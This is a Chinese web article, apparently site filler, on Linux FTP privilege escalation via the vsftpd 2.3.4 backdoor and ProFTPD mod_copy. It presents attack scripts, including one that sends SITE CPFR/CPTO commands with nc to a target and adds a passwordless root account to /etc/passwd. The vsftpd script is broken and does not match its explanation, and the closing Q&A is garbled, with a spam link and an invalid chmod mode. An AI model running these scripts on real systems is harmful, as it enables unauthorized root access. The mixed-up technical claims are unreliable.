使用Linux FTP实现系统提权的方法和技巧 (linux ftp 提权)

在计算机安全领域中，系统提权是指通过攻击手段，使得攻击者可以以管理员或root的权限来执行操作，进而控制该系统的行为。系统提权的攻击方式有很多种，其中一种常用的手段是利用FTP漏洞进行攻击。

在Linux操作系统中，FTP（File Transfer Protocol）是一种广泛应用的文件传输协议，用于从一个系统向另一个系统传输文件。默认情况下，Linux系统中的FTP服务运行在非特权用户下，但在某些情况下，攻击者可以通过FTP的漏洞来提权，获取管理员或root权限。

本文将介绍，为读者提供一个关于FTP提权攻击的深入理解。

一、利用vsftpd漏洞进行攻击

vsftpd是一种流行的FTP服务器软件，大多数Linux发行版使用该软件来提供FTP服务。该软件有一个名为“vsftpd-2.3.4.tar.gz”的历史版本，存在一个漏洞，攻击者可以利用该漏洞来提升权限。

攻击者可以使用该漏洞来创建一个具有root权限的shell，使其能够执行任意命令，从而完全控制目标系统。攻击者需要构造一个恶意的FTP命令，并将其发送到目标系统。下面是一个攻击成功的示例：

root@attacker:~/ftp_attack# cat vsftpd_exploit

!/bin/bash

echo -en “User test \r\nPASS password \r\n” > /tmp/.ftp

/bin/timeout 2s /usr/bin/ftp -in

if [ ! -u /tmp/sh ]; then echo “[-] Exploit fled”; else echo “[+] Exploit success”; /tmp/sh; fi

上述脚本中首先创建了一个名为“vsftpd_exploit”的文件，并将其上传到目标系统的FTP服务器中。然后，脚本对FTP服务器发送恶意命令以执行攻击。

如果攻击成功，则会在目标系统上生成一个名为“/tmp/sh”的文件，该文件为具有root权限的shell，并将攻击者的控制命令输出到该shell中。攻击者可以使用该shell来执行任意命令。

二、利用ProFTPD漏洞进行攻击

ProFTPD是一种流行的FTP服务器软件，大多数Linux发行版使用该软件来提供FTP服务。该软件中存在一个名为“mod_copy”的模块，攻击者可以利用该模块的漏洞来提升权限并执行任意命令。

攻击者可以向ProFTPD服务器上传一个具有可执行权限的可执行文件，然后通过利用mod_copy模块的漏洞，将该文件拷贝到目标系统中的指定位置，从而提升权限。

下面是一个攻击ProFTPD服务器的方式：

root@attacker:~/ftp_attack# cat proftpd_exploit.sh

#!/bin/bash

echo “echo ‘nobody::0:0:nobody:/root:/bin/bash’ >> /etc/passwd” > /tmp/proftpd.txt

echo -e “SITE CPFR /proc/self/cmdline\r\nSITE CPTO /tmp/runas\r\n” | nc targetip 21

echo -e “SITE CPFR /tmp/proftpd.txt\r\nSITE CPTO /etc/passwd\r\n” | nc targetip 21

rm /tmp/proftpd.txt

攻击者可以使用上述脚本来攻击目标系统，其中“targetip”为目标系统的IP地址。脚本首先创建一个具有root权限的用户，然后向目标系统上传一个名为“proftpd_exploit.sh”的文件，并将其拷贝到目标系统中的指定位置。

脚本使用了ProFTPD服务器的SITE CPFR和SITE CPTO命令来执行FTP拷贝操作，从而完成提权。

在Linux系统中，攻击者可以利用FTP的漏洞来提升权限，获取管理员或root权限。本文介绍了两种提权攻击方法，分别是利用vsftpd漏洞和ProFTPD漏洞进行攻击。

为了防止这些攻击，建议管理员在服务器上安装防火墙和入侵检测系统，以阻止攻击者对FTP服务的滥用。此外，还应定期进行系统补丁和漏洞扫描，以发现并修复系统中的漏洞。

相关问题拓展阅读：

• 如何在服务器上用微软自带FTP提权?
• 求救，linux 下FTP如果设置用户只有上传、下载而没有删除的权限？

如何在服务器上用微软自带FTP提权?

在IIS上面建一个FTP站点网站就可以了，详情请登陆www,ttring.com就可以了

微软的ftp目如唯前没有提权的漏洞，只是在渣祥培早期的2023系统的iss中有，但是早就不存在了。所以ftp提权放弃吧宴正。限制的目录跳转只是禁止权限继承而已，还是从cmd

shell下手吧。

求救，linux 下FTP如果设置用户只有上传、下载而没有删除的权限？

关键在权限，那么说明你的ftp与账户完全没有问题，那么简单，先确认该用户账户的ftp访问目录具置的上一级目录（一定要上一级目录），然后

ls -l ，看是否有w权限，应该没有，给那个文件夹加上权限即可。假如那个文件夹名字叫 folder

用chmod ugo+rzw folder 即可。

记的需要重新启动ftp服务

自己先看看去吧。

里面的配置太多了，你一时半会看不明白，如果你的配置文件里没这个就加上。保存后service vsftpd restart就OK了。可读可写不能删。

cmds_allowed＝FEAT,REST,CWD,LIST,MDTM,MKD,NLST,PASS,PASV,PORT,PWD,QUIT,RMD,SIZE,STOR,TYPE,USER,ACCT,APPE,CDUP,HELP,MODE,NOOP,REIN,STAT,STOU,STRU,SYST

关于linux ftp 提权的介绍到此就结束了，不知道你从中找到你需要的信息了吗 ？如果你还想了解更多这方面的信息，记得收藏关注本站。